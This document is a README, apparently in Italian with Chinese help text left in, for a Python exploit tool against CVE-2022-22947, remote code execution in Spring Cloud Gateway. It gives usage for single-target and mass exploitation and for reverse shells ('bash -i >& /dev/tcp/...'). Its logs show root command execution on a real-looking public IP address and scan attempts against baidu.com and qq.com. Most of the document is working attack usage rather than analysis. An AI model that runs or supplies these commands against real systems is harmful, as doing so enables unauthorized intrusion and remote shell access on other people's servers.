
Uno script per la verifica singola o batch, che può anche generare una reverse shell.
Livello di pericolo: Alto
Stato POC/EXP: Pubblico
ID CNVD: CNNVD-2022-16402
ID CVE: CVE-2022-22947
Spring Cloud Gateway presenta una vulnerabilità di esecuzione di codice remoto. Questa vulnerabilità si verifica nell'endpoint Actuator dell'applicazione Spring Cloud Gateway che, quando abilitato, esposto e non sicuro, è suscettibile ad attacchi di code injection. Un attaccante può sfruttare questa vulnerabilità creando richieste malevole che consentono l'esecuzione di comandi arbitrari sull'host remoto.
Supporta la verifica di un singolo target
Supporta la verifica di massa delle vulnerabilità
Supporta reverse shell
-h Visualizza le informazioni di aiuto
-u Specifica l'URL del target
-c Specifica il comando da eseguire, default: id
-f Specifica il file con gli URL dei target
1. Verifica di un singolo target
Metodo 1:
E:\pocs>python cve-2022-22947.py
验证单个目标:
1、python cve-2022-22947.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python cve-2022-22947.py -u http://example.com -c whoami
验证多个目标
1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
反弹shell
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、进入交互模式,输入目标和反弹shell的命令
请输入一个目标url地址:http://123.58.236.76:8484
请输入想要执行的命令,默认执行id:whoami
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
Metodo 2:
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami
验证单个目标:
1、python cve-2022-22947.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python cve-2022-22947.py -u http://example.com -c whoami
验证多个目标
1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
反弹shell
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、进入交互模式,输入目标和反弹shell的命令
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
2. Verifica di massa
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt
验证单个目标:
1、python cve-2022-22947.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python cve-2022-22947.py -u http://example.com -c whoami
验证多个目标
1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
反弹shell
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、进入交互模式,输入目标和反弹shell的命令
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[-]目标:http://www.baidu.com,漏洞验证失败,请手动验证!
[-]目标:http://www.qq.com,漏洞验证失败,请手动验证!
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
3. Reverse shell
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"
image-20220519233354807
image-20220519233429912